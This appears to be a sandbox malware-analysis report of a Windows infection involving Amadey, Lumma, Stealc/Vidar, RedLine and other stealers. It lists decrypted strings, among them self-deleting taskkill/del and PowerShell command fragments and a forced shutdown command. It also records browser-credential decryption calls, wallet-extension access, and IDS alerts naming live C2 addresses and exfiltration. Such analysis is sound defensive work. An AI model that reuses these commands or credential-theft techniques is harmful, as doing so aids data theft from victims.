Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ComputerName
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -unicode-
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: VideoID
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProductName
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: CurrentBuild
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32.exe
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: "taskkill /f /im "
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && timeout 1 && del
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: && Exit"
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && ren
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Powershell.exe
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shutdown -s -t 0
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: random

Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C456C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	8_2_6C456C80
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5AA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	8_2_6C5AA9A0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5A4440 PK11_PrivDecrypt,	8_2_6C5A4440
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C574420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	8_2_6C574420
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5A44C0 PK11_PubEncrypt,	8_2_6C5A44C0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5F25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	8_2_6C5F25B0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5AA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	8_2_6C5AA650
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C588670 PK11_ExportEncryptedPrivKeyInfo,	8_2_6C588670
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C58E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	8_2_6C58E6E0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C5CA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	8_2_6C5CA730

Source: 382cd038a3.exe, 00000010.00000003.2214419534.0000000007614000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_d1677b34-8

Phishing

Yara detected obfuscated html page

Source: Yara match

File source: C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta, type: DROPPED

Source: 0xqfQZufeQ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.26.12.31:443 -> 192.168.2.8:49831 version: TLS 1.0

Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.8:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.8:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.8:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.8:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.8:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.8:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.8:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.8:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.202.5.153:443 -> 192.168.2.8:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49856 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49869 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:49888 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.8:49891 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:49895 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:49900 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49902 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49903 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49906 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49908 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49945 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.8:49957 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:49998 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.129.91:443 -> 192.168.2.8:50001 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50004 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50006 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50005 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:50007 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: 0f39a8c7db.exe, 00000008.00000002.2524620028.000000006C4BD000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: nss3.pdb@ source: 0f39a8c7db.exe, 00000008.00000002.2529505786.000000006C67F000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: nss3.pdb source: 0f39a8c7db.exe, 00000008.00000002.2529505786.000000006C67F000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: mozglue.pdb source: 0f39a8c7db.exe, 00000008.00000002.2524620028.000000006C4BD000.00000002.00000001.01000000.00000015.sdmp

Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: chrome.exe	Memory has grown: Private usage: 1MB later: 29MB
Source: firefox.exe	Memory has grown: Private usage: 1MB later: 181MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:49709 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.16:80 -> 192.168.2.8:49709
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49710 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49711 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49712 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.8:49711 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.115:80 -> 192.168.2.8:49711
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.8:49711 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.115:80 -> 192.168.2.8:49711
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.8:49711 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49721 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49740 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 1800002 - Severity 1 - Joe Security MALWARE Nymiam - C&C DLL Key Request : 192.168.2.8:49746 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 1800003 - Severity 1 - Joe Security MALWARE Nymiam - C&C DLL Download Request : 192.168.2.8:49746 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 1800004 - Severity 1 - Joe Security MALWARE Nymiam - C&C Files Download Request : 192.168.2.8:49746 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 2856121 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M2 : 192.168.2.8:49757 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.8:49745
Source: Network traffic	Suricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.8:49762 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.8:49765 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49770 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.8:49773 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2059018 - Severity 1 - ET MALWARE CryptBot CnC Checkin : 192.168.2.8:49754 -> 94.156.102.239:80
Source: Network traffic	Suricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.8:49777 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2059149 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rampnatleadk .click) : 192.168.2.8:54086 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49780 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.8:49790 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.8:49787 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49791 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49799 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.8:49781 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49805 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.8:49797 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49815 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 1800005 - Severity 1 - Joe Security MALWARE Nymiam - C&C Software Download Request : 192.168.2.8:49746 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.8:49818 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.8:49818 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49826 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 103.84.89.222:33791 -> 192.168.2.8:49818
Source: Network traffic	Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.8:49818 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 103.84.89.222:33791 -> 192.168.2.8:49818
Source: Network traffic	Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.8:49818 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49834 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 1800002 - Severity 1 - Joe Security MALWARE Nymiam - C&C DLL Key Request : 192.168.2.8:49860 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49849 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 1800003 - Severity 1 - Joe Security MALWARE Nymiam - C&C DLL Download Request : 192.168.2.8:49860 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 1800004 - Severity 1 - Joe Security MALWARE Nymiam - C&C Files Download Request : 192.168.2.8:49860 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 1800005 - Severity 1 - Joe Security MALWARE Nymiam - C&C Software Download Request : 192.168.2.8:49860 -> 185.156.73.23:80
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49768 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49768 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49762 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49762 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49777 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49782 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49772 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49772 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49797 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49821 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49821 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49810 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49846 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49846 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.8:49832 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49859 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49823 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49823 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49882 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49882 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49848 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49848 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49908 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.8:49844 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49929 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49929 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.202.5.153:443 -> 192.168.2.8:49844
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49854 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49904 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49904 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49945 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49945 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49907 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49957 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49957 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49879 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49857 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49894 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49894 -> 116.202.5.153:443
